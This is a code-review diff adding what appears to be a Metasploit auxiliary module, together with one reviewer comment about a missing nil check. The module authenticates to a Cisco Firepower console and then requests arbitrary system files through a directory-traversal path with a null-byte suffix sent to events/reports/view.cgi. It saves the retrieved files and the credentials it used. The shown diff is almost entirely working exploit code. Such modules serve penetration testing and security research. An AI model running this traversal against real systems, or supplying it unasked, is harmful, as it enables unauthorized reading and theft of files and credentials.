modules/auxiliary/scanner/http/cisco_firepower_download.rb

```diff
@@ -0,0 +1,165 @@
+  end
+
+  def do_login(ip)
+    console_user = datastore['USERNAME']
+    console_pass = datastore['PASSWORD']
+    uri          = normalize_uri(target_uri.path, 'login.cgi')
+
+    print_status("Attempting to login in as #{console_user}:#{console_pass}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'username' => console_user,
+        'password' => console_pass,
+        'target'   => ''
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
+    end
+
+    res_cookie = res.get_cookies
+    if res.code == 302 && res_cookie.include?('CGISESSID')
+      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
+      print_status("CGI Session ID: #{cgi_sid}")
+      print_good("Authenticated as #{console_user}:#{console_pass}")
+      report_cred(ip: ip, username: console_user, password: console_pass)
+      return cgi_sid
+    end
+
+    nil
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: rport,
+      service_name: 'cisco',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def download_file(cgi_sid, file)
+    file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"
+    print_status("Requesting: #{file_path}")
+    send_request_cgi({
+      'method' => 'GET',
+      'cookie' => "CGISESSID=#{cgi_sid}",
+      'uri'    => normalize_uri(target_uri.path, 'events/reports/view.cgi'),
+      'vars_get' => {
+        'download' => '1',
+        'files'    => file_path
+      }
+    })
+  end
+
+  def remote_file_exists?(res)
+    (
+      res.headers['Content-Disposition'] &&
+      res.headers['Content-Disposition'].match(/attachment; filename=/) &&
+      res.headers['Content-Type'] &&
+      res.headers['Content-Type'] == 'application/octet-stream'
+    )
+  end
+
+  def save_file(res, ip)
+    fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])
+
+    path = store_loot(
+      'cisco.https',
+      'application/octet-stream',
+      ip,
+      res.body,
+      fname
+      )
+
+    print_good("File saved in: #{path}")
+  end
+
+  def run_host(ip)
+    cgi_sid = do_login(ip)
+
+    unless cgi_sid
+      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
+    end
+
+    res = download_file(cgi_sid, datastore['FILEPATH'])
+    if remote_file_exists?(res)
```

Comment:
if the cgi_request in download_file doesn't return a good object, remote_file_exists never checks that its not null/none.  My ruby skills stink, but should there be a check in remote_file_exists to ensure its not accessing a null object?